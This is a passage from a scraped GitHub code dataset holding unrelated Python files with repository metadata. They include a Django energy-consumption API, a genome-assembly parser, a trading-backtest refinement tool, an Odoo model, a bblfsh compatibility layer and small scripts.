week_day + i,\r\n ).first()\r\n td_hour = td + timedelta(days=i - week_day)\r\n active_energy_last = (\r\n consume_last.active_energy if consume_last is not None else 0\r\n )\r\n active_energy_first = (\r\n consume_first.active_energy if consume_first is not None else 0\r\n )\r\n total_consume = active_energy_last - active_energy_first\r\n hour_consume = {\r\n \"meter_date\": td_hour.isoformat(\" \", \"seconds\"),\r\n \"value\": total_consume,\r\n }\r\n return_data.append(hour_consume)\r\n return return_data\r\n\r\n\r\ndef monthly_consume(td):\r\n total_days = calendar.monthrange(td.year, td.month)\r\n return_data = []\r\n print(total_days)\r\n for i in range(1, total_days[-1] + 1):\r\n consume_last = WattConsume.objects.filter(\r\n meter_date__year=td.year, meter_date__month=td.month, meter_date__day=i\r\n ).last()\r\n consume_first = WattConsume.objects.filter(\r\n meter_date__year=td.year, meter_date__month=td.month, meter_date__day=i\r\n ).first()\r\n td_hour = td.replace(day=i)\r\n active_energy_last = (\r\n consume_last.active_energy if consume_last is not None else 0\r\n )\r\n active_energy_first = (\r\n consume_first.active_energy if consume_first is not None else 0\r\n )\r\n total_consume = active_energy_last - active_energy_first\r\n hour_consume = {\r\n \"meter_date\": td_hour.isoformat(\" \", \"seconds\"),\r\n \"value\": total_consume,\r\n }\r\n return_data.append(hour_consume)\r\n return return_data\r\n\r\n\r\nclass DailyWattConsume(generics.ListAPIView):\r\n serializer_class = OutputSerializer\r\n queryset = WattConsume.objects.all()\r\n\r\n def get(self, request, *args, **kwargs):\r\n date_param = self.request.query_params.get(\r\n \"date\", datetime.now().strftime(\"%Y-%m-%d\")\r\n )\r\n period_param = self.request.query_params.get(\"period\", \"daily\")\r\n try:\r\n td = datetime.strptime(date_param, \"%Y-%m-%d\")\r\n\r\n if period_param == \"daily\":\r\n return Response(daily_consume(td=td))\r\n elif period_param == \"weekly\":\r\n return Response(weekly_consume(td=td))\r\n elif period_param == \"monthly\":\r\n return Response(monthly_consume(td=td))\r\n else:\r\n content = {\"meter_date\": None, \"value\": None}\r\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\r\n except Exception as e:\r\n print(e)\r\n content = {\r\n \"ERROR\": e.__str__(),\r\n }\r\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\r\n","repo_name":"JavierLGZ/watts_api","sub_path":"watts_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"1790996621","text":"##\n#Functions for working with Celera output\n##\n\nfrom collections import namedtuple\n\n\nFRG_t = namedtuple('FRG_t', [\"type\",\"ident\",\"container\",\"parent\",\"hang\",\"position\"])\nUnitig_t = namedtuple('Unitig_t', [\"id\", \"header\",\"frags\"])\n\ndef unitig_layout_iterator(string_iterable):\n '''Iterates over all of the unitigs\n unitig 1\n len 0\n cns\n qlt\n data.unitig_coverage_stat 1.000000\n data.unitig_microhet_prob 1.000000\n data.unitig_status X\n data.unitig_suggest_repeat F\n data.unitig_suggest_unique F\n data.unitig_force_repeat F\n data.unitig_force_unique F\n data.contig_status U\n data.num_frags 1071\n data.num_unitigs 0\n FRG type R ident 20549 container 0 parent 59207 hang 136 3755 position 11621 0\n FRG type R ident 72784 container 20549 parent 20549 hang 290 -3884 position 7734 292\n '''\n \n it = iter(string_iterable)\n try:\n first = it.next()\n except StopIteration:\n first = None\n \n if not first or not first.startswith(\"unitig\"):\n raise Exception(\"No \\'unitig\\' at start of file\")\n \n unitig_id = first.strip().split()[1]\n header = \"\"\n frags = []\n while True:\n try:\n l = it.next()\n except StopIteration:\n l = None\n if not l or l.startswith(\"unitig\"):\n yield Unitig_t(unitig_id, header, frags)\n if not l:\n break\n unitig_id = l.strip().split()[1]\n header = \"\"\n frags = []\n else:\n if l.startswith(\"FRG\"):\n arr = l.strip().split()\n frags.append(FRG_t(arr[2],int(arr[4]),int(arr[6]),int(arr[8]),(int(arr[10]),\n int(arr[11])),\n (int(arr[13]),int(arr[14]))))\n else:\n header += l\n","repo_name":"jgurtowski/jbio","sub_path":"jbio/celera.py","file_name":"celera.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37958560510","text":"import importlib\nimport os\nimport sys\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom subprocess import PIPE, Popen\nfrom time import sleep, strftime, gmtime\nfrom timeit import default_timer as timer\nfrom jesse.routes import router\n\n\nimport jessetk.Vars as Vars\nimport jessetk.utils\nfrom jessetk import utils\nfrom jessetk.Vars import datadir\nfrom jessetk.Vars import refine_file_header\nimport json\nfrom millify import millify\nfrom importlib.metadata import version\n\nclass Refine:\n def __init__(self, hp_py_file, start_date, finish_date, eliminate, cpu, dd, mr, lpr, sharpe, profit, imcount, sortby='sharpe', full_reports=False):\n\n import signal\n signal.signal(signal.SIGINT, self.signal_handler)\n\n self.hp_py_file = hp_py_file\n self.start_date = start_date\n self.finish_date = finish_date\n self.cpu = cpu\n self.eliminate = eliminate\n self.dd = dd\n self.mr = mr\n self.lpr = lpr\n self.sharpe = sharpe\n self.profit = profit\n self.imcount = imcount\n self.sortby = sortby.replace('profit', 'total_profit')\n # Minimum is better for max lp rate, so we need to reverse the sort\n self.sort_reverse = sortby != 'lpr'\n self.fr = ' --full-reports' if full_reports else ''\n self.jessetkdir = datadir\n self.anchor = 'DNA!'\n self.sort_by = {'serenity': 12, 'sharpe': 13, 'calmar': 14}\n\n self.metrics = []\n\n self.n_of_iters = 0\n self.results = []\n self.sorted_results = []\n self.results_without_dna = []\n\n self.hps_module = None\n self.routes_template = None\n self.params = None\n self.n_of_params = None\n\n r = router.routes[0] # Read first route from routes.py\n self.exchange = r.exchange\n self.pair = r.symbol\n self.timeframe = r.timeframe\n self.strategy = r.strategy_name\n\n self.removesimilardnas = False\n\n self.ts = datetime.now().strftime(\"%Y%m%d %H%M%S\")\n self.filename = f'RefineHp-{self.exchange}-{self.pair}-{self.timeframe}--{start_date}--{finish_date}'\n\n self.report_file_name = f'{self.jessetkdir}/results/{self.filename}--{self.ts}.csv'\n self.log_file_name = f'{self.jessetkdir}/logs/{self.filename}--{self.ts}.log'\n\n def run(self):\n max_cpu = self.cpu\n processes = []\n commands = []\n results = []\n sorted_results = []\n iters_completed = 0\n self.import_dnas()\n iters = self.n_of_params\n self.n_of_iters = self.n_of_params\n index = 0 # TODO Reduce number of vars ...\n start = timer()\n\n while iters > 0:\n commands = []\n\n for _ in range(max_cpu):\n if iters > 0:\n hps = self.params[index]\n # hps = json.dumps(hps).replace('\"', '%')\n # print(f'parameters: {hps}')\n\n commands.append(\n f'jesse-tk backtest {self.start_date} {self.finish_date} --seq {hps}{self.fr}'\n )\n\n index += 1\n iters -= 1\n # print(f'commands: {commands}')\n processes = [Popen(cmd, shell=True, stdout=PIPE) for cmd in commands]\n\n # wait for completion\n for p in processes:\n p.wait()\n\n # Get thread's console output\n (output, err) = p.communicate()\n # debug\n # print(output.decode('utf-8'))\n try:\n print(err.decode('utf-8'))\n except:\n pass\n # exit()\n iters_completed += 1\n\n # Map console output to a dict\n metric = utils.get_metrics3(output.decode('utf-8'))\n metric['dna'] = metric['seq_hps']\n\n # print('Metrics decoded', len(metric))\n\n if metric not in results:\n results.append(deepcopy(metric))\n\n sorted_results_prelist = sorted(results, key=lambda x: float(x[self.sortby]), reverse=self.sort_reverse)\n # print(f'Sorted results: {sorted_results_prelist}')\n # print('Sorted results', len(sorted_results_prelist))\n\n # sleep(10)\n self.sorted_results = []\n\n if self.eliminate:\n for r in sorted_results_prelist:\n if float(r['sharpe']) > 0:\n self.sorted_results.append(r)\n else:\n self.sorted_results = sorted_results_prelist\n\n utils.clear_console()\n\n eta = ((timer() - start) / index) * (self.n_of_params - index)\n eta_formatted = strftime(\"%H:%M:%S\", gmtime(eta))\n\n print(\n f'{index}/{self.n_of_params}\\teta: {eta_formatted} | {self.pair} |'\n f' {self.timeframe} | {self.start_date} -> {self.finish_date} |'\n f\" Sort by {self.sortby} {'reversed' if self.sort_reverse else ''} |\"\n f\" Filters: MR% {self.mr}, DD% {self.dd}, LPR {self.lpr}, Sharpe {self.sharpe}, Profit: {self.profit} | Ver. {version('jesse-tk')}\")\n\n self.print_tops_formatted(n=30)\n\n # if self.eliminate:\n # self.save_dnas(self.sorted_results, self.dna_py_file)\n # else:\n # self.save_dnas(self.sorted_results)\n\n # self.save_seq(self.sorted_results)\n\n candidates = {\n r['dna']: r['dna']\n for r in self.sorted_results\n if r['max_dd'] > self.dd and r['max_margin_ratio'] < self.mr and r['lpr'] < self.lpr and r['sharpe'] > self.sharpe and r['total_profit'] > self.profit and r['insuff_margin_count'] <= self.imcount\n }\n\n print(f'\\n\\nCandidates: {len(candidates)}')\n seq_fn = f'SEQ-{self.pair}-{self.strategy}-{self.start_date}-{self.finish_date}.py'\n\n with open(seq_fn, 'w') as f:\n f.write(\"hps = \")\n f.write(json.dumps(candidates, indent=1))\n\n with open('last_seq_fn', 'w') as f:\n f.write(seq_fn)\n\n utils.create_csv_report(self.sorted_results,\n self.report_file_name, refine_file_header)\n\n\n def signal_handler(self, sig, frame):\n print('You pressed Ctrl+C!')\n sys.exit(0)\n\n def import_dnas(self):\n module_name = self.hp_py_file.replace('.\\\\', '').replace('.py', '')\n module_name = module_name.replace('/', '.').replace('.py', '')\n print(module_name)\n\n self.hps_module = importlib.import_module(module_name)\n importlib.reload(self.hps_module)\n self.params = [*self.hps_module.hps] # self.hps_module.hps.keys()\n self.n_of_params = len(self.params)\n print(f'Imported {self.n_of_params} parameters...')\n # print('self.params', self.params)\n # sleep(5)\n \n # v TODO Move to utils\n def print_tops_formatted(self, sorted_results=None, n:int = 50):\n if sorted_results is None:\n sorted_results = self.sorted_results\n \n print(\n jessetk.Vars.refine_console_formatter.format(*jessetk.Vars.refine_console_header1))\n print(\n jessetk.Vars.refine_console_formatter.format(*jessetk.Vars.refine_console_header2))\n\n for r in sorted_results[:n]:\n p = r\n # Replace None with empty string\n for k, v in p.items():\n if v is None:\n p[k] = ''\n\n # p = {}\n # # make a copy of r dict but round values if they are floats\n # for k, v in r.items():\n # try:\n # if type(v) is float and v > 999999:\n # p[k] = millify(v, 2)\n # elif type(v) is float and abs(v) > 999:\n # p[k] = round(v)\n # else:\n # p[k] = v\n # except:\n # p[k] = v\n\n # for i in range(len(r)):\n # if isinstance(r[i], float) and r[i] > 999999:\n # p.append(millify(round(r[i]), 2)) # '{:.2f}'.format(r[i])\n # # elif isinstance(r[i], float) and r[i] > 1000:\n # # p.append(round(r[i], 2))\n # else:\n # p.append(r[i])\n\n print(\n jessetk.Vars.refine_console_formatter.format(\n p['dna'],\n p['total_trades'],\n p['n_of_longs'],\n p['n_of_shorts'],\n p['total_profit'],\n p['max_margin_ratio'],\n p['pmr'],\n p['lpr'],\n p['insuff_margin_count'],\n p['max_dd'],\n p['annual_return'],\n p['win_rate'],\n p['serenity'],\n p['sharpe'],\n p['calmar'],\n p['win_strk'],\n p['lose_strk'],\n p['largest_win'],\n p['largest_lose'],\n p['n_of_wins'],\n p['n_of_loses'],\n p['paid_fees'],\n p['market_change']))\n\n # def print_tops_formatted(self):\n # print(\n # Vars.refine_console_formatter.format(*Vars.refine_console_header1))\n # print(\n # Vars.refine_console_formatter.format(*Vars.refine_console_header2))\n\n # for r in self.sorted_results[:25]:\n \n # p = {}\n # # make a copy of r dict but round values if they are floats\n # for k, v in r.items():\n # if type(v) is float and v > 999999:\n # p[k] = millify(v, 2)\n # elif type(v) is float and abs(v) > 999:\n # p[k] = round(v)\n # else:\n # p[k] = v\n\n # # for i in range(len(r)):\n # # if isinstance(r[i], float) and r[i] > 999999:\n # # p.append(millify(round(r[i]), 2)) # '{:.2f}'.format(r[i])\n # # # elif isinstance(r[i], float) and r[i] > 1000:\n # # # p.append(round(r[i], 2))\n # # else:\n # # p.append(r[i])\n\n # print(\n # Vars.refine_console_formatter.format(\n # p['dna'],\n # p['total_trades'],\n # p['n_of_longs'],\n # p['n_of_shorts'],\n # p['total_profit'],\n # p['max_dd'],\n # p['annual_return'],\n # p['win_rate'],\n # p['serenity'],\n # p['sharpe'],\n # p['calmar'],\n # p['win_strk'],\n # p['lose_strk'],\n # p['largest_win'],\n # p['largest_lose'],\n # p['n_of_wins'],\n # p['n_of_loses'],\n # p['paid_fees'],\n # p['market_change']))\n\n def save_dnas(self, sorted_results, dna_fn=None):\n\n if not dna_fn:\n dna_fn = f'{self.jessetkdir}/dnafiles/{self.pair} {self.start_date} {self.finish_date}.py'\n\n jessetk.utils.remove_file(dna_fn)\n\n with open(dna_fn, 'w', encoding='utf-8') as f:\n self.write_dna_file(f, sorted_results)\n\n def write_dna_file(self, f, sorted_results):\n f.write('dnas = [\\n')\n\n for srr in sorted_results:\n for dnac in self.dnas:\n if srr['dna'] == dnac[0]:\n f.write(str(dnac) + ',\\n')\n\n f.write(']\\n')\n f.flush()\n os.fsync(f.fileno())\n","repo_name":"ysdede/jesse-tk","sub_path":"jessetk/RefineSeq.py","file_name":"RefineSeq.py","file_ext":"py","file_size_in_byte":11860,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"16"} +{"seq_id":"27110056915","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\nclass ref_po_pp(models.Model):\n _name = 'tjara.ref_po_pp' # Ref purchase order _ product package\n \n name = fields.Char(string='ref po pp', store=True, readonly=True)\n product_package_id = fields.Many2one('tjara.product_package', ondelete='cascade', required=True, index=True)\n purchase_order_id = fields.Many2one('tjara.purchase_order', ondelete='cascade', required=True, index=True)\n \n qte = fields.Integer(string='Number Package', required=True)\n qte_prpk = fields.Float(related='product_package_id.qte', store=True, digits=(12, 3), help=\"Qte or Nbr per package\", string=\"Qte ou Nbr\", readonly=True)\n unity = fields.Selection(related='product_package_id.package_id.unity', store=True, string=\"Unity\", readonly=True)\n qte_prpk_unity = fields.Char(string=\"Qte or Nbr / Unity\", store=True, compute=\"_compute_qte_prpk_unity\")\n qte_total = fields.Integer(string='Total Quantity', compute='_compute_qte_total', store=True)\n qte_total_unity = fields.Char(string=\"Total Quantity\", compute=\"_compute_qte_total_unity\", store=True)\n \n @api.constrains('product_package_id', 'purchase_order_id')\n def check_qte(self):\n if(rec.qte < 1):\n raise ValidationError(\"Please set a valid quantity : %s\" % rec.qte)\n \n \n @api.constrains('qte')\n @api.multi\n def check_qte(self):\n for rec in self:\n if(rec.qte < 1):\n raise ValidationError(\"Please set a valid quantity : %s\" % rec.qte)\n\n @api.depends('qte_prpk', 'qte')\n @api.multi\n def _compute_qte_total(self):\n for rec in self:\n if(isinstance(rec.qte, int))and(isinstance(rec.qte_prpk, float)):\n rec.qte_total = rec.qte * rec.qte_prpk\n \n @api.multi\n @api.depends('qte', 'qte_prpk', 'unity')\n def _compute_qte_total_unity(self):\n for rec in self:\n if((rec.unity)and(isinstance(rec.qte_total, int))):\n rec.qte_total_unity = str(rec.qte * rec.qte_prpk) + \" \" + rec.unity\n \n @api.multi\n @api.depends('qte_prpk', 'unity')\n def _compute_qte_prpk_unity(self):\n for rec in self:\n if((rec.unity)and(isinstance(rec.qte_prpk, float))and(rec.qte_prpk > 0)):\n rec.qte_prpk_unity = str(rec.qte_prpk) + str(rec.unity) + \" / Package\"","repo_name":"ZiedHf/tjara","sub_path":"models/ref_po_pp.py","file_name":"ref_po_pp.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72450104968","text":"\"\"\"\nThis file provides a compatibility layer with the old UAST V1 (or python-client\nv2) API. You can see a summary of that API here:\n\nhttps://github.com/bblfsh/python-client/blob/c17d9cb6cd3e55ad150bd1d62a1de2e228d7db04/README.md\n\nNote that this won't translate the XPath queries from the old projection to the new use;\neven when using this module you're expected to use expressions matching the new\nprojection.\n\nNote that since this is a pure Python translation layer, some performance\nimpact is to be expected.\n\"\"\"\nimport os\nimport sys\nfrom typing import Union, List, Any, Optional\n\nimport grpc\n\nimport bblfsh.client as newbbl\nfrom bblfsh import role_id, role_name\nfrom bblfsh.node import Node\nfrom bblfsh.node_iterator import NodeIterator\nfrom bblfsh.result_context import ResultContext\nfrom bblfsh.aliases import (\n ParseRequest, ParseResponse, DriverStub, ProtocolServiceStub,\n VersionRequest, SupportedLanguagesRequest, ModeType,\n Mode, VersionResponse, DESCRIPTOR\n)\nfrom bblfsh.pyuast import uast, iterator as native_iterator\nfrom bblfsh.tree_order import TreeOrder\n\nprint(\"Warning: using deprecated bblfsh v1 compatibility layer.\", file=sys.stderr)\n\n\nclass WrongTypeException(Exception):\n \"\"\"\n This exception is raised when the API receives an unexpected type\n \"\"\"\n pass\n\n\nclass CompatParseResponse:\n \"\"\"\n This class emulates the API of the old ParseResponse object.\n \"\"\"\n def __init__(self, ctx: ResultContext, filename: str = \"\") -> None:\n self._res_context = ctx\n self._filename = filename\n\n @property\n def uast(self) -> Node:\n \"\"\"\n Returns the root Node.\n \"\"\"\n return self._res_context.uast\n\n @property\n def ast(self) -> Node:\n \"\"\"\n Returns the root Node. This is provided for compatibility, but\n since the type of result is now expecified using CompatBblfshClient.parse\n or parse_native, it'll return the same as uast().\n \"\"\"\n return self._res_context.ast\n\n @property\n def ctx(self) -> ResultContext:\n \"\"\"\n Returns the ResultContext of the response.\n \"\"\"\n return self._res_context\n\n @property\n def elapsed(self) -> int:\n \"\"\"\n Provided for compatibility, but since the new API's ParseResponse doesn't\n provide an elapsed time it'll always return -1.\n \"\"\"\n # FIXME(juanjux): check if the caller can get this, or measure it ourselves.\n return -1\n\n @property\n def language(self) -> str:\n \"\"\"\n Returns the language used for the request.\n \"\"\"\n return self._res_context.language\n\n @property\n def filename(self) -> str:\n \"\"\"\n Returns the filename used for the request.\n \"\"\"\n return self._filename\n\n @property\n def DESCRIPTOR(self) -> Any:\n \"\"\"\n Returns the gRPC context descriptor.\n \"\"\"\n return self._res_context.ctx.DESCRIPTOR\n\n @property\n def errors(selfs) -> List:\n \"\"\"\n Provided for compatibility. Since the new API will raise exceptions on errors,\n this just returns and empty array.\n \"\"\"\n # ParseResponse would have raised an exception on errors\n return []\n\n\nclass CompatBblfshClient:\n \"\"\"\n This emulates the methods and properties of the old BblfshClient.\n \"\"\"\n def __init__(self, endpoint: Union[str, grpc.Channel]) -> None:\n \"\"\"\n Connects to the specified grpc endpoint which can be specified either as\n a grpc Channel object or a connection string (like \"0.0.0.0:6432\").\n \"\"\"\n self._bblfsh_cli = newbbl.BblfshClient(endpoint)\n\n self._channel = self._bblfsh_cli._channel\n self._stub_v1 = self._bblfsh_cli._stub_v1\n self._stub_v2 = self._bblfsh_cli._stub_v2\n\n def _parse(self, filename: str, language: str = None, contents: str = None,\n timeout: float = None,\n mode: ModeType = Mode.Value('ANNOTATED')) -> CompatParseResponse:\n\n if timeout is not None:\n timeout = int(timeout)\n\n res = self._bblfsh_cli.parse(filename, language, contents,\n mode=mode, timeout=timeout)\n return CompatParseResponse(res, filename)\n\n def parse(self, filename: str, language: str = None, contents: str = None,\n timeout: float = None) -> CompatParseResponse:\n\n \"\"\"\n Parse the specified filename or contents and return a CompatParseResponse.\n \"\"\"\n\n return self._parse(filename, language, contents, timeout,\n Mode.Value('ANNOTATED'))\n\n def native_parse(self, filename: str, language: str = None,\n contents: str = None,\n timeout: float = None) -> CompatParseResponse:\n \"\"\"\n Same as parse() but the returned response will include only the native\n (non annotated) AST.\n \"\"\"\n\n return self._parse(filename, language, contents, timeout,\n Mode.Value('NATIVE'))\n\n def supported_languages(self) -> List[str]:\n \"\"\"\n Return a list of the languages that can be parsed by the connected\n endpoint (driver or bblfsh daemon).\n \"\"\"\n return self._bblfsh_cli.supported_languages()\n\n def version(self) -> VersionResponse:\n \"\"\"\n Returns the connected endpoint version.\n \"\"\"\n return self._bblfsh_cli.version()\n\n def close(self) -> None:\n \"\"\"\n Closes the connection to the endpoint.\n \"\"\"\n return self._bblfsh_cli.close()\n\n\nclass CompatNodeIterator:\n \"\"\"\n This emulates the API of the pre-v3 iterators.\n \"\"\"\n def __init__(self, nodeit: NodeIterator, only_nodes: bool = False) -> None:\n \"\"\"\n Creates a CompatNodeIterator compatibility object using a NodeIterator\n from the post-v3 API. If the only_nodes parameter is set to true,\n scalars and strings won't be included in the results.\n \"\"\"\n self._nodeit = nodeit\n self._only_nodes = only_nodes\n # Used to forward calls of the old Node object\n self._last_node: Optional[Node] = None\n\n def __iter__(self) -> 'CompatNodeIterator':\n return self\n\n def __next__(self) -> Node:\n next_val = next(self._nodeit)\n\n is_node = isinstance(next_val, Node)\n val = next_val.internal_node if is_node else next_val\n\n # Skip positions and non dicts/lists, the later if only_nodes = True\n skip = False\n if isinstance(val, dict):\n if \"@type\" not in val or val[\"@type\"] == \"uast:Positions\":\n skip = True\n elif self._only_nodes:\n skip = True\n\n if skip:\n val = self.__next__().internal_node\n\n ret_val = next_val if is_node else Node(value=val)\n self._last_node = ret_val\n return ret_val\n\n def filter(self, query: str) -> Optional['CompatNodeIterator']:\n \"\"\"\n Further filter the results using this iterator as base.\n \"\"\"\n if not self._last_node:\n return None\n\n return filter(self._last_node, query)\n\n @property\n def properties(self) -> dict:\n \"\"\"\n Returns the properties of the current node in the iteration.\n \"\"\"\n if isinstance(self._last_node, dict):\n return self._last_node.keys()\n else:\n return {}\n\n\ndef iterator(n: Union[Node, CompatNodeIterator, dict],\n order: TreeOrder = TreeOrder.PRE_ORDER) -> CompatNodeIterator:\n \"\"\"\n This function has the same signature as the pre-v3 iterator()\n call returning a compatibility CompatNodeIterator.\n \"\"\"\n\n if isinstance(n, CompatNodeIterator):\n return CompatNodeIterator(n._nodeit.iterate(order), only_nodes=True)\n elif isinstance(n, Node):\n nat_it = native_iterator(n.internal_node, order)\n return CompatNodeIterator(NodeIterator(nat_it), only_nodes=True)\n elif isinstance(n, dict):\n nat_it = native_iterator(n, order)\n return CompatNodeIterator(NodeIterator(nat_it, uast()), only_nodes=True)\n else:\n raise WrongTypeException(\n \"iterator on non node or iterator type (%s)\" % str(type(n))\n )\n\n\ndef filter(n: Node, query: str) -> CompatNodeIterator:\n \"\"\"\n This function has the same signature as the pre-v3 filter() returning a\n compatibility CompatNodeIterator.\n \"\"\"\n ctx = uast()\n return CompatNodeIterator(NodeIterator(ctx.filter(query, n.internal_node), ctx))\n\n\ndef filter_nodes(n: Node, query: str) -> CompatNodeIterator:\n \"\"\"\n Utility function. Same as filter() but will only filter for nodes (i. e.\n it will exclude scalars and positions).\n \"\"\"\n return CompatNodeIterator(filter(n, query)._nodeit, only_nodes=True)\n\n\nclass TypedQueryException(Exception):\n \"\"\"\n This exception will be raised when a query for a specific type (str, int, float...)\n returns a different type of more than one result.\n \"\"\"\n pass\n\n\ndef _scalariter2item(n: Node, query: str, wanted_type: type) -> Any:\n rlist = list(filter(n, query))\n\n if len(rlist) > 1:\n raise TypedQueryException(\"More than one result for %s typed query\" % str(type))\n\n value = rlist[0]\n if isinstance(value, Node):\n value = value.internal_node\n\n value_type = type(value)\n if wanted_type == float and value_type == int:\n value = float(value)\n\n if not isinstance(value, wanted_type):\n raise TypedQueryException(\"Typed query for type %s returned type %s instead\"\n % (str(wanted_type), str(type(value))))\n\n return wanted_type(value)\n\n\ndef filter_string(n: Node, query: str) -> str:\n \"\"\"\n Filter and ensure that the returned value is of string type.\n \"\"\"\n return _scalariter2item(n, query, str)\n\n\ndef filter_bool(n: Node, query: str) -> bool:\n \"\"\"\n Filter and ensure that the returned value is of type bool.\n \"\"\"\n return _scalariter2item(n, query, bool)\n\n\ndef filter_int(n: Node, query: str) -> int:\n \"\"\"\n Filter and ensure that the returned value is of type int.\n \"\"\"\n return _scalariter2item(n, query, int)\n\n\ndef filter_float(n: Node, query: str) -> float:\n \"\"\"\n Filter and ensure that the returned value is of type int.\n \"\"\"\n return _scalariter2item(n, query, float)\n\n\nfilter_number = filter_float\n","repo_name":"bblfsh/python-client","sub_path":"bblfsh/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":10367,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"16"} +{"seq_id":"153018056","text":"import re\nlines = list(map(lambda l:l.strip(), open(\"/dev/stdin\")))\n\nfields = dict()\nrate = 0\ntickets = []\nall_ranges = []\nfor line in lines:\n\tm = re.match(r\"(.+)\\: (\\d+)-(\\d+) or (\\d+)-(\\d+)\", line)\n\tif m:\n\t\tl1, r1 = int(m[2]), int(m[3])\n\t\tl2, r2 = int(m[4]), int(m[5])\n\t\tfields[m[1]] = [(l1,r1), (l2,r2)]\n\t\tall_ranges += [(l1,r1), (l2,r2)]\n\telif line == \"your ticket:\":\n\t\tvalids = [set(fields.keys()) for i in range(len(fields))]\n\t\tmode=\"your\"\n\telif line == \"nearby tickets:\":\n\t\tmode=\"nearby\"\n\telif line == \"\":\n\t\tpass\n\telse:\n\t\tif mode == \"your\":\n\t\t\tmyticket = (list(map(int, line.split(\",\"))))\n\t\t\n\t\tvalid_ticket = True\n\t\tfor i,x in enumerate(line.split(\",\")):\n\t\t\tx = int(x)\n\n\t\t\tok = False\n\t\t\tfor l,r in all_ranges:\n\t\t\t\tif l <= x <= r:\n\t\t\t\t\tok = True\n\t\t\t\t\tbreak\n\t\t\tif not ok:\n\t\t\t\tvalid_ticket = False\n\n\t\tif not valid_ticket:\n\t\t\tcontinue\n\n\t\tfor i,x in enumerate(line.split(\",\")):\n\t\t\tx = int(x)\n\t\t\tfor name,ranges in fields.items():\n\t\t\t\tif name not in valids[i]:\n\t\t\t\t\tcontinue\n\t\t\t\tok = False\n\t\t\t\tfor l,r in ranges:\n\t\t\t\t\tif l <= x <= r:\n\t\t\t\t\t\tok = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif not ok:\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tprint(f\"{i} remove {name} ({x} not in {ranges})\")\n\t\t\t\t\tvalids[i].remove(name)\n\nunsolved = set(range(len(valids)))\nsolved = set()\nfieldmap = dict()\nwhile len(unsolved) > 0:\n\tfor i in unsolved:\n\t\tvalids[i] = valids[i] - solved\n\t\tif len(valids[i]) == 1:\n\t\t\tsol, = valids[i]\n\t\t\tunsolved.remove(i)\n\t\t\tsolved.add(sol)\n\t\t\tfieldmap[sol] = i\n\t\t\tbreak\nprint(fieldmap)\nret = 1\nfor field,pos in fieldmap.items():\n\tif field.startswith(\"departure\"):\n\t\tret *= myticket[pos]\nprint(ret)","repo_name":"taavirepan/adventofcode2020","sub_path":"16/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14699042420","text":"import addn1 as A\r\ndef call(n1):\r\n i=1\r\n data = []\r\n \r\n while(i<=n1):\r\n print(\"Enter the number:\")\r\n num = int(input())\r\n i = i+1\r\n data.append(num)\r\n print(data)\r\n \r\n max1 = 0\r\n for i in range(0,len(data)):\r\n if ( data[i] > max1):\r\n max1 = data[i]\r\n #return max1\r\n print(\"Maximum number is:\",max1)\r\n \r\n \r\ndef main():\r\n \r\n print(\"Enter the how many numbers you want:\")\r\n n = int(input())\r\n call(n)\r\n \r\nif __name__==\"__main__\":\r\n\tmain()","repo_name":"PrachiBorawake/Python_codes","sub_path":"Assignment3_2.py","file_name":"Assignment3_2.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9188491338","text":"from cryptography.fernet import Fernet\n\nmsg = input(\"Inserisci il messaggio da decriptare: \")\nchiave = input(\"Inserisci la chiave di crittografia: \")\n\n\nmes_crypt = Fernet(chiave).decrypt(bytes(msg, \"UTF_8\"))\n\nwith open(\"messaggio_decriptato.txt\", \"wb\") as f:\n f.write(mes_crypt)\n f.close","repo_name":"mattiabosetti/crypt-message","sub_path":"decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14048503578","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 10 19:08:54 2018\r\n\r\n@author: laris\r\n\"\"\"\r\nfrom PyQt5.QtWidgets import QDialog, QLayout\r\nfrom PyQt5 import QtGui\r\nfrom PyQt5.uic import loadUi\r\nfrom PyQt5.QtGui import QIcon\r\nfrom PyQt5 import QtCore\r\nfrom PyQt5 import QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QApplication\r\nimport sys, tela, glossario, os, zipfile, cadastrar_disciplina, pymysql, tela_sobre, subprocess, platform, shutil, webbrowser\r\n\r\n\r\nclass TelaInicial(QDialog):\r\n def __init__(self):\r\n super(TelaInicial, self).__init__()\r\n #super(GuiLibras, self)\r\n path = os.path.dirname(os.path.realpath(__file__))\r\n os.chdir(path)\r\n #print(os.path.join(os.getcwd()))\r\n self.ui = loadUi(os.path.join(os.getcwd(), r'tela_inicial.ui'), self)\r\n \r\n #if self.ui.btnIniciar.isChecked():\r\n self.scrollArea.hide()\r\n self.init_components()\r\n self.get_user_path()\r\n self.check_disc()\r\n self.components_scroll()\r\n d = self.get_disc()\r\n #[0].clicked.connect(lambda:self.set_disc(d))\r\n self.ui.btnIniciar.clicked.connect(lambda:open(d))\r\n self.ui.btnCadastrar.clicked.connect(open_disc)\r\n self.btnDisc.clicked.connect(lambda:self.validacao())\r\n # self.ui.btn1.clicked.connect(open_sobre)\r\n self.ui.pushButton.clicked.connect(self.open_chm)\r\n self.get_system\r\n\r\n \r\n def 